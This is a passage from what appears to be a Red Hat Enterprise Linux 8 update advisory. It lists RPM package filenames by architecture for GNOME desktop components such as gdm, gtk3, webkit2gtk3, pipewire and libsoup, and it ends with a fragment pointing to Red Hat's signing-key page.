frei0r-plugins-opencv-debuginfo-1.6.1-7.el8.s390x.rpm
gdm-3.28.3-34.el8.s390x.rpm
gdm-debuginfo-3.28.3-34.el8.s390x.rpm
gdm-debugsource-3.28.3-34.el8.s390x.rpm
gnome-control-center-3.28.2-22.el8.s390x.rpm
gnome-control-center-debuginfo-3.28.2-22.el8.s390x.rpm
gnome-control-center-debugsource-3.28.2-22.el8.s390x.rpm
gnome-remote-desktop-0.1.8-3.el8.s390x.rpm
gnome-remote-desktop-debuginfo-0.1.8-3.el8.s390x.rpm
gnome-remote-desktop-debugsource-0.1.8-3.el8.s390x.rpm
gnome-session-3.28.1-10.el8.s390x.rpm
gnome-session-debuginfo-3.28.1-10.el8.s390x.rpm
gnome-session-debugsource-3.28.1-10.el8.s390x.rpm
gnome-session-wayland-session-3.28.1-10.el8.s390x.rpm
gnome-session-xsession-3.28.1-10.el8.s390x.rpm
gnome-settings-daemon-3.32.0-11.el8.s390x.rpm
gnome-settings-daemon-debuginfo-3.32.0-11.el8.s390x.rpm
gnome-settings-daemon-debugsource-3.32.0-11.el8.s390x.rpm
gnome-shell-3.32.2-20.el8.s390x.rpm
gnome-shell-debuginfo-3.32.2-20.el8.s390x.rpm
gnome-shell-debugsource-3.32.2-20.el8.s390x.rpm
gnome-terminal-3.28.3-2.el8.s390x.rpm
gnome-terminal-debuginfo-3.28.3-2.el8.s390x.rpm
gnome-terminal-debugsource-3.28.3-2.el8.s390x.rpm
gnome-terminal-nautilus-3.28.3-2.el8.s390x.rpm
gnome-terminal-nautilus-debuginfo-3.28.3-2.el8.s390x.rpm
gsettings-desktop-schemas-devel-3.32.0-5.el8.s390x.rpm
gtk-update-icon-cache-3.22.30-6.el8.s390x.rpm
gtk-update-icon-cache-debuginfo-3.22.30-6.el8.s390x.rpm
gtk3-3.22.30-6.el8.s390x.rpm
gtk3-debuginfo-3.22.30-6.el8.s390x.rpm
gtk3-debugsource-3.22.30-6.el8.s390x.rpm
gtk3-devel-3.22.30-6.el8.s390x.rpm
gtk3-devel-debuginfo-3.22.30-6.el8.s390x.rpm
gtk3-immodule-xim-3.22.30-6.el8.s390x.rpm
gtk3-immodule-xim-debuginfo-3.22.30-6.el8.s390x.rpm
gtk3-immodules-debuginfo-3.22.30-6.el8.s390x.rpm
gtk3-tests-debuginfo-3.22.30-6.el8.s390x.rpm
gvfs-1.36.2-10.el8.s390x.rpm
gvfs-afp-1.36.2-10.el8.s390x.rpm
gvfs-afp-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-archive-1.36.2-10.el8.s390x.rpm
gvfs-archive-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-client-1.36.2-10.el8.s390x.rpm
gvfs-client-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-debugsource-1.36.2-10.el8.s390x.rpm
gvfs-devel-1.36.2-10.el8.s390x.rpm
gvfs-fuse-1.36.2-10.el8.s390x.rpm
gvfs-fuse-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-goa-1.36.2-10.el8.s390x.rpm
gvfs-goa-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-gphoto2-1.36.2-10.el8.s390x.rpm
gvfs-gphoto2-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-mtp-1.36.2-10.el8.s390x.rpm
gvfs-mtp-debuginfo-1.36.2-10.el8.s390x.rpm
gvfs-smb-1.36.2-10.el8.s390x.rpm
gvfs-smb-debuginfo-1.36.2-10.el8.s390x.rpm
libsoup-debuginfo-2.62.3-2.el8.s390x.rpm
libsoup-debugsource-2.62.3-2.el8.s390x.rpm
libsoup-devel-2.62.3-2.el8.s390x.rpm
mutter-3.32.2-48.el8.s390x.rpm
mutter-debuginfo-3.32.2-48.el8.s390x.rpm
mutter-debugsource-3.32.2-48.el8.s390x.rpm
mutter-tests-debuginfo-3.32.2-48.el8.s390x.rpm
nautilus-3.28.1-14.el8.s390x.rpm
nautilus-debuginfo-3.28.1-14.el8.s390x.rpm
nautilus-debugsource-3.28.1-14.el8.s390x.rpm
nautilus-extensions-3.28.1-14.el8.s390x.rpm
nautilus-extensions-debuginfo-3.28.1-14.el8.s390x.rpm
pipewire-0.3.6-1.el8.s390x.rpm
pipewire-alsa-debuginfo-0.3.6-1.el8.s390x.rpm
pipewire-debuginfo-0.3.6-1.el8.s390x.rpm
pipewire-debugsource-0.3.6-1.el8.s390x.rpm
pipewire-devel-0.3.6-1.el8.s390x.rpm
pipewire-gstreamer-debuginfo-0.3.6-1.el8.s390x.rpm
pipewire-libs-0.3.6-1.el8.s390x.rpm
pipewire-libs-debuginfo-0.3.6-1.el8.s390x.rpm
pipewire-utils-0.3.6-1.el8.s390x.rpm
pipewire-utils-debuginfo-0.3.6-1.el8.s390x.rpm
pipewire0.2-debugsource-0.2.7-6.el8.s390x.rpm
pipewire0.2-devel-0.2.7-6.el8.s390x.rpm
pipewire0.2-libs-0.2.7-6.el8.s390x.rpm
pipewire0.2-libs-debuginfo-0.2.7-6.el8.s390x.rpm
potrace-1.15-3.el8.s390x.rpm
potrace-debuginfo-1.15-3.el8.s390x.rpm
potrace-debugsource-1.15-3.el8.s390x.rpm
pygobject3-debuginfo-3.28.3-2.el8.s390x.rpm
pygobject3-debugsource-3.28.3-2.el8.s390x.rpm
python3-gobject-3.28.3-2.el8.s390x.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.s390x.rpm
python3-gobject-debuginfo-3.28.3-2.el8.s390x.rpm
tracker-2.1.5-2.el8.s390x.rpm
tracker-debuginfo-2.1.5-2.el8.s390x.rpm
tracker-debugsource-2.1.5-2.el8.s390x.rpm
vte-profile-0.52.4-2.el8.s390x.rpm
vte291-0.52.4-2.el8.s390x.rpm
vte291-debuginfo-0.52.4-2.el8.s390x.rpm
vte291-debugsource-0.52.4-2.el8.s390x.rpm
vte291-devel-debuginfo-0.52.4-2.el8.s390x.rpm
webkit2gtk3-2.28.4-1.el8.s390x.rpm
webkit2gtk3-debuginfo-2.28.4-1.el8.s390x.rpm
webkit2gtk3-debugsource-2.28.4-1.el8.s390x.rpm
webkit2gtk3-devel-2.28.4-1.el8.s390x.rpm
webkit2gtk3-devel-debuginfo-2.28.4-1.el8.s390x.rpm
webkit2gtk3-jsc-2.28.4-1.el8.s390x.rpm
webkit2gtk3-jsc-debuginfo-2.28.4-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-2.28.4-1.el8.s390x.rpm
webkit2gtk3-jsc-devel-debuginfo-2.28.4-1.el8.s390x.rpm
webrtc-audio-processing-0.3-9.el8.s390x.rpm
webrtc-audio-processing-debuginfo-0.3-9.el8.s390x.rpm
webrtc-audio-processing-debugsource-0.3-9.el8.s390x.rpm
xdg-desktop-portal-1.6.0-2.el8.s390x.rpm
xdg-desktop-portal-debuginfo-1.6.0-2.el8.s390x.rpm
xdg-desktop-portal-debugsource-1.6.0-2.el8.s390x.rpm
xdg-desktop-portal-gtk-1.6.0-1.el8.s390x.rpm
xdg-desktop-portal-gtk-debuginfo-1.6.0-1.el8.s390x.rpm
xdg-desktop-portal-gtk-debugsource-1.6.0-1.el8.s390x.rpm
x86_64:
LibRaw-0.19.5-2.el8.i686.rpm
LibRaw-0.19.5-2.el8.x86_64.rpm
LibRaw-debuginfo-0.19.5-2.el8.i686.rpm
LibRaw-debuginfo-0.19.5-2.el8.x86_64.rpm
LibRaw-debugsource-0.19.5-2.el8.i686.rpm
LibRaw-debugsource-0.19.5-2.el8.x86_64.rpm
LibRaw-samples-debuginfo-0.19.5-2.el8.i686.rpm
LibRaw-samples-debuginfo-0.19.5-2.el8.x86_64.rpm
PackageKit-1.1.12-6.el8.x86_64.rpm
PackageKit-command-not-found-1.1.12-6.el8.x86_64.rpm
PackageKit-command-not-found-debuginfo-1.1.12-6.el8.i686.rpm
PackageKit-command-not-found-debuginfo-1.1.12-6.el8.x86_64.rpm
PackageKit-cron-1.1.12-6.el8.x86_64.rpm
PackageKit-debuginfo-1.1.12-6.el8.i686.rpm
PackageKit-debuginfo-1.1.12-6.el8.x86_64.rpm
PackageKit-debugsource-1.1.12-6.el8.i686.rpm
PackageKit-debugsource-1.1.12-6.el8.x86_64.rpm
PackageKit-glib-1.1.12-6.el8.i686.rpm
PackageKit-glib-1.1.12-6.el8.x86_64.rpm
PackageKit-glib-debuginfo-1.1.12-6.el8.i686.rpm
PackageKit-glib-debuginfo-1.1.12-6.el8.x86_64.rpm
PackageKit-gstreamer-plugin-1.1.12-6.el8.x86_64.rpm
PackageKit-gstreamer-plugin-debuginfo-1.1.12-6.el8.i686.rpm
PackageKit-gstreamer-plugin-debuginfo-1.1.12-6.el8.x86_64.rpm
PackageKit-gtk3-module-1.1.12-6.el8.i686.rpm
PackageKit-gtk3-module-1.1.12-6.el8.x86_64.rpm
PackageKit-gtk3-module-debuginfo-1.1.12-6.el8.i686.rpm
PackageKit-gtk3-module-debuginfo-1.1.12-6.el8.x86_64.rpm
dleyna-renderer-0.6.0-3.el8.x86_64.rpm
dleyna-renderer-debuginfo-0.6.0-3.el8.x86_64.rpm
dleyna-renderer-debugsource-0.6.0-3.el8.x86_64.rpm
frei0r-plugins-1.6.1-7.el8.x86_64.rpm
frei0r-plugins-debuginfo-1.6.1-7.el8.x86_64.rpm
frei0r-plugins-debugsource-1.6.1-7.el8.x86_64.rpm
frei0r-plugins-opencv-1.6.1-7.el8.x86_64.rpm
frei0r-plugins-opencv-debuginfo-1.6.1-7.el8.x86_64.rpm
gdm-3.28.3-34.el8.i686.rpm
gdm-3.28.3-34.el8.x86_64.rpm
gdm-debuginfo-3.28.3-34.el8.i686.rpm
gdm-debuginfo-3.28.3-34.el8.x86_64.rpm
gdm-debugsource-3.28.3-34.el8.i686.rpm
gdm-debugsource-3.28.3-34.el8.x86_64.rpm
gnome-control-center-3.28.2-22.el8.x86_64.rpm
gnome-control-center-debuginfo-3.28.2-22.el8.x86_64.rpm
gnome-control-center-debugsource-3.28.2-22.el8.x86_64.rpm
gnome-photos-3.28.1-3.el8.x86_64.rpm
gnome-photos-debuginfo-3.28.1-3.el8.x86_64.rpm
gnome-photos-debugsource-3.28.1-3.el8.x86_64.rpm
gnome-photos-tests-3.28.1-3.el8.x86_64.rpm
gnome-remote-desktop-0.1.8-3.el8.x86_64.rpm
gnome-remote-desktop-debuginfo-0.1.8-3.el8.x86_64.rpm
gnome-remote-desktop-debugsource-0.1.8-3.el8.x86_64.rpm
gnome-session-3.28.1-10.el8.x86_64.rpm
gnome-session-debuginfo-3.28.1-10.el8.x86_64.rpm
gnome-session-debugsource-3.28.1-10.el8.x86_64.rpm
gnome-session-wayland-session-3.28.1-10.el8.x86_64.rpm
gnome-session-xsession-3.28.1-10.el8.x86_64.rpm
gnome-settings-daemon-3.32.0-11.el8.x86_64.rpm
gnome-settings-daemon-debuginfo-3.32.0-11.el8.x86_64.rpm
gnome-settings-daemon-debugsource-3.32.0-11.el8.x86_64.rpm
gnome-shell-3.32.2-20.el8.x86_64.rpm
gnome-shell-debuginfo-3.32.2-20.el8.x86_64.rpm
gnome-shell-debugsource-3.32.2-20.el8.x86_64.rpm
gnome-terminal-3.28.3-2.el8.x86_64.rpm
gnome-terminal-debuginfo-3.28.3-2.el8.x86_64.rpm
gnome-terminal-debugsource-3.28.3-2.el8.x86_64.rpm
gnome-terminal-nautilus-3.28.3-2.el8.x86_64.rpm
gnome-terminal-nautilus-debuginfo-3.28.3-2.el8.x86_64.rpm
gsettings-desktop-schemas-3.32.0-5.el8.i686.rpm
gsettings-desktop-schemas-devel-3.32.0-5.el8.i686.rpm
gsettings-desktop-schemas-devel-3.32.0-5.el8.x86_64.rpm
gtk-update-icon-cache-3.22.30-6.el8.x86_64.rpm
gtk-update-icon-cache-debuginfo-3.22.30-6.el8.i686.rpm
gtk-update-icon-cache-debuginfo-3.22.30-6.el8.x86_64.rpm
gtk3-3.22.30-6.el8.i686.rpm
gtk3-3.22.30-6.el8.x86_64.rpm
gtk3-debuginfo-3.22.30-6.el8.i686.rpm
gtk3-debuginfo-3.22.30-6.el8.x86_64.rpm
gtk3-debugsource-3.22.30-6.el8.i686.rpm
gtk3-debugsource-3.22.30-6.el8.x86_64.rpm
gtk3-devel-3.22.30-6.el8.i686.rpm
gtk3-devel-3.22.30-6.el8.x86_64.rpm
gtk3-devel-debuginfo-3.22.30-6.el8.i686.rpm
gtk3-devel-debuginfo-3.22.30-6.el8.x86_64.rpm
gtk3-immodule-xim-3.22.30-6.el8.x86_64.rpm
gtk3-immodule-xim-debuginfo-3.22.30-6.el8.i686.rpm
gtk3-immodule-xim-debuginfo-3.22.30-6.el8.x86_64.rpm
gtk3-immodules-debuginfo-3.22.30-6.el8.i686.rpm
gtk3-immodules-debuginfo-3.22.30-6.el8.x86_64.rpm
gtk3-tests-debuginfo-3.22.30-6.el8.i686.rpm
gtk3-tests-debuginfo-3.22.30-6.el8.x86_64.rpm
gvfs-1.36.2-10.el8.x86_64.rpm
gvfs-afc-1.36.2-10.el8.x86_64.rpm
gvfs-afc-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-afc-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-afp-1.36.2-10.el8.x86_64.rpm
gvfs-afp-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-afp-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-archive-1.36.2-10.el8.x86_64.rpm
gvfs-archive-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-archive-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-client-1.36.2-10.el8.i686.rpm
gvfs-client-1.36.2-10.el8.x86_64.rpm
gvfs-client-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-client-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-debugsource-1.36.2-10.el8.i686.rpm
gvfs-debugsource-1.36.2-10.el8.x86_64.rpm
gvfs-devel-1.36.2-10.el8.i686.rpm
gvfs-devel-1.36.2-10.el8.x86_64.rpm
gvfs-fuse-1.36.2-10.el8.x86_64.rpm
gvfs-fuse-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-fuse-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-goa-1.36.2-10.el8.x86_64.rpm
gvfs-goa-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-goa-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-gphoto2-1.36.2-10.el8.x86_64.rpm
gvfs-gphoto2-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-gphoto2-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-mtp-1.36.2-10.el8.x86_64.rpm
gvfs-mtp-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-mtp-debuginfo-1.36.2-10.el8.x86_64.rpm
gvfs-smb-1.36.2-10.el8.x86_64.rpm
gvfs-smb-debuginfo-1.36.2-10.el8.i686.rpm
gvfs-smb-debuginfo-1.36.2-10.el8.x86_64.rpm
libsoup-debuginfo-2.62.3-2.el8.i686.rpm
libsoup-debuginfo-2.62.3-2.el8.x86_64.rpm
libsoup-debugsource-2.62.3-2.el8.i686.rpm
libsoup-debugsource-2.62.3-2.el8.x86_64.rpm
libsoup-devel-2.62.3-2.el8.i686.rpm
libsoup-devel-2.62.3-2.el8.x86_64.rpm
mutter-3.32.2-48.el8.i686.rpm
mutter-3.32.2-48.el8.x86_64.rpm
mutter-debuginfo-3.32.2-48.el8.i686.rpm
mutter-debuginfo-3.32.2-48.el8.x86_64.rpm
mutter-debugsource-3.32.2-48.el8.i686.rpm
mutter-debugsource-3.32.2-48.el8.x86_64.rpm
mutter-tests-debuginfo-3.32.2-48.el8.i686.rpm
mutter-tests-debuginfo-3.32.2-48.el8.x86_64.rpm
nautilus-3.28.1-14.el8.x86_64.rpm
nautilus-debuginfo-3.28.1-14.el8.i686.rpm
nautilus-debuginfo-3.28.1-14.el8.x86_64.rpm
nautilus-debugsource-3.28.1-14.el8.i686.rpm
nautilus-debugsource-3.28.1-14.el8.x86_64.rpm
nautilus-extensions-3.28.1-14.el8.i686.rpm
nautilus-extensions-3.28.1-14.el8.x86_64.rpm
nautilus-extensions-debuginfo-3.28.1-14.el8.i686.rpm
nautilus-extensions-debuginfo-3.28.1-14.el8.x86_64.rpm
pipewire-0.3.6-1.el8.i686.rpm
pipewire-0.3.6-1.el8.x86_64.rpm
pipewire-alsa-debuginfo-0.3.6-1.el8.i686.rpm
pipewire-alsa-debuginfo-0.3.6-1.el8.x86_64.rpm
pipewire-debuginfo-0.3.6-1.el8.i686.rpm
pipewire-debuginfo-0.3.6-1.el8.x86_64.rpm
pipewire-debugsource-0.3.6-1.el8.i686.rpm
pipewire-debugsource-0.3.6-1.el8.x86_64.rpm
pipewire-devel-0.3.6-1.el8.i686.rpm
pipewire-devel-0.3.6-1.el8.x86_64.rpm
pipewire-doc-0.3.6-1.el8.x86_64.rpm
pipewire-gstreamer-debuginfo-0.3.6-1.el8.i686.rpm
pipewire-gstreamer-debuginfo-0.3.6-1.el8.x86_64.rpm
pipewire-libs-0.3.6-1.el8.i686.rpm
pipewire-libs-0.3.6-1.el8.x86_64.rpm
pipewire-libs-debuginfo-0.3.6-1.el8.i686.rpm
pipewire-libs-debuginfo-0.3.6-1.el8.x86_64.rpm
pipewire-utils-0.3.6-1.el8.x86_64.rpm
pipewire-utils-debuginfo-0.3.6-1.el8.i686.rpm
pipewire-utils-debuginfo-0.3.6-1.el8.x86_64.rpm
pipewire0.2-debugsource-0.2.7-6.el8.i686.rpm
pipewire0.2-debugsource-0.2.7-6.el8.x86_64.rpm
pipewire0.2-devel-0.2.7-6.el8.i686.rpm
pipewire0.2-devel-0.2.7-6.el8.x86_64.rpm
pipewire0.2-libs-0.2.7-6.el8.i686.rpm
pipewire0.2-libs-0.2.7-6.el8.x86_64.rpm
pipewire0.2-libs-debuginfo-0.2.7-6.el8.i686.rpm
pipewire0.2-libs-debuginfo-0.2.7-6.el8.x86_64.rpm
potrace-1.15-3.el8.i686.rpm
potrace-1.15-3.el8.x86_64.rpm
potrace-debuginfo-1.15-3.el8.i686.rpm
potrace-debuginfo-1.15-3.el8.x86_64.rpm
potrace-debugsource-1.15-3.el8.i686.rpm
potrace-debugsource-1.15-3.el8.x86_64.rpm
pygobject3-debuginfo-3.28.3-2.el8.i686.rpm
pygobject3-debuginfo-3.28.3-2.el8.x86_64.rpm
pygobject3-debugsource-3.28.3-2.el8.i686.rpm
pygobject3-debugsource-3.28.3-2.el8.x86_64.rpm
python3-gobject-3.28.3-2.el8.i686.rpm
python3-gobject-3.28.3-2.el8.x86_64.rpm
python3-gobject-base-3.28.3-2.el8.i686.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.i686.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.x86_64.rpm
python3-gobject-debuginfo-3.28.3-2.el8.i686.rpm
python3-gobject-debuginfo-3.28.3-2.el8.x86_64.rpm
tracker-2.1.5-2.el8.i686.rpm
tracker-2.1.5-2.el8.x86_64.rpm
tracker-debuginfo-2.1.5-2.el8.i686.rpm
tracker-debuginfo-2.1.5-2.el8.x86_64.rpm
tracker-debugsource-2.1.5-2.el8.i686.rpm
tracker-debugsource-2.1.5-2.el8.x86_64.rpm
vte-profile-0.52.4-2.el8.x86_64.rpm
vte291-0.52.4-2.el8.i686.rpm
vte291-0.52.4-2.el8.x86_64.rpm
vte291-debuginfo-0.52.4-2.el8.i686.rpm
vte291-debuginfo-0.52.4-2.el8.x86_64.rpm
vte291-debugsource-0.52.4-2.el8.i686.rpm
vte291-debugsource-0.52.4-2.el8.x86_64.rpm
vte291-devel-debuginfo-0.52.4-2.el8.i686.rpm
vte291-devel-debuginfo-0.52.4-2.el8.x86_64.rpm
webkit2gtk3-2.28.4-1.el8.i686.rpm
webkit2gtk3-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-debuginfo-2.28.4-1.el8.i686.rpm
webkit2gtk3-debuginfo-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-debugsource-2.28.4-1.el8.i686.rpm
webkit2gtk3-debugsource-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-devel-2.28.4-1.el8.i686.rpm
webkit2gtk3-devel-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-devel-debuginfo-2.28.4-1.el8.i686.rpm
webkit2gtk3-devel-debuginfo-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-jsc-2.28.4-1.el8.i686.rpm
webkit2gtk3-jsc-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-jsc-debuginfo-2.28.4-1.el8.i686.rpm
webkit2gtk3-jsc-debuginfo-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-2.28.4-1.el8.i686.rpm
webkit2gtk3-jsc-devel-2.28.4-1.el8.x86_64.rpm
webkit2gtk3-jsc-devel-debuginfo-2.28.4-1.el8.i686.rpm
webkit2gtk3-jsc-devel-debuginfo-2.28.4-1.el8.x86_64.rpm
webrtc-audio-processing-0.3-9.el8.i686.rpm
webrtc-audio-processing-0.3-9.el8.x86_64.rpm
webrtc-audio-processing-debuginfo-0.3-9.el8.i686.rpm
webrtc-audio-processing-debuginfo-0.3-9.el8.x86_64.rpm
webrtc-audio-processing-debugsource-0.3-9.el8.i686.rpm
webrtc-audio-processing-debugsource-0.3-9.el8.x86_64.rpm
xdg-desktop-portal-1.6.0-2.el8.x86_64.rpm
xdg-desktop-portal-debuginfo-1.6.0-2.el8.x86_64.rpm
xdg-desktop-portal-debugsource-1.6.0-2.el8.x86_64.rpm
xdg-desktop-portal-gtk-1.6.0-1.el8.x86_64.rpm
xdg-desktop-portal-gtk-debuginfo-1.6.0-1.el8.x86_64.rpm
xdg-desktop-portal-gtk-debugsource-1.6.0-1.el8.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
gsettings-desktop-schemas-3.32.0-5.el8.src.rpm
libsoup-2.62.3-2.el8.src.rpm
pygobject3-3.28.3-2.el8.src.rpm
aarch64:
gsettings-desktop-schemas-3.32.0-5.el8.aarch64.rpm
libsoup-2.62.3-2.el8.aarch64.rpm
libsoup-debuginfo-2.62.3-2.el8.aarch64.rpm
libsoup-debugsource-2.62.3-2.el8.aarch64.rpm
pygobject3-debuginfo-3.28.3-2.el8.aarch64.rpm
pygobject3-debugsource-3.28.3-2.el8.aarch64.rpm
python3-gobject-base-3.28.3-2.el8.aarch64.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.aarch64.rpm
python3-gobject-debuginfo-3.28.3-2.el8.aarch64.rpm
ppc64le:
gsettings-desktop-schemas-3.32.0-5.el8.ppc64le.rpm
libsoup-2.62.3-2.el8.ppc64le.rpm
libsoup-debuginfo-2.62.3-2.el8.ppc64le.rpm
libsoup-debugsource-2.62.3-2.el8.ppc64le.rpm
pygobject3-debuginfo-3.28.3-2.el8.ppc64le.rpm
pygobject3-debugsource-3.28.3-2.el8.ppc64le.rpm
python3-gobject-base-3.28.3-2.el8.ppc64le.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.ppc64le.rpm
python3-gobject-debuginfo-3.28.3-2.el8.ppc64le.rpm
s390x:
gsettings-desktop-schemas-3.32.0-5.el8.s390x.rpm
libsoup-2.62.3-2.el8.s390x.rpm
libsoup-debuginfo-2.62.3-2.el8.s390x.rpm
libsoup-debugsource-2.62.3-2.el8.s390x.rpm
pygobject3-debuginfo-3.28.3-2.el8.s390x.rpm
pygobject3-debugsource-3.28.3-2.el8.s390x.rpm
python3-gobject-base-3.28.3-2.el8.s390x.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.s390x.rpm
python3-gobject-debuginfo-3.28.3-2.el8.s390x.rpm
x86_64:
gsettings-desktop-schemas-3.32.0-5.el8.x86_64.rpm
libsoup-2.62.3-2.el8.i686.rpm
libsoup-2.62.3-2.el8.x86_64.rpm
libsoup-debuginfo-2.62.3-2.el8.i686.rpm
libsoup-debuginfo-2.62.3-2.el8.x86_64.rpm
libsoup-debugsource-2.62.3-2.el8.i686.rpm
libsoup-debugsource-2.62.3-2.el8.x86_64.rpm
pygobject3-debuginfo-3.28.3-2.el8.x86_64.rpm
pygobject3-debugsource-3.28.3-2.el8.x86_64.rpm
python3-gobject-base-3.28.3-2.el8.x86_64.rpm
python3-gobject-base-debuginfo-3.28.3-2.el8.x86_64.rpm
python3-gobject-debuginfo-3.28.3-2.el8.x86_64.rpm
Red Hat CodeReady Linux Builder (v. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7 |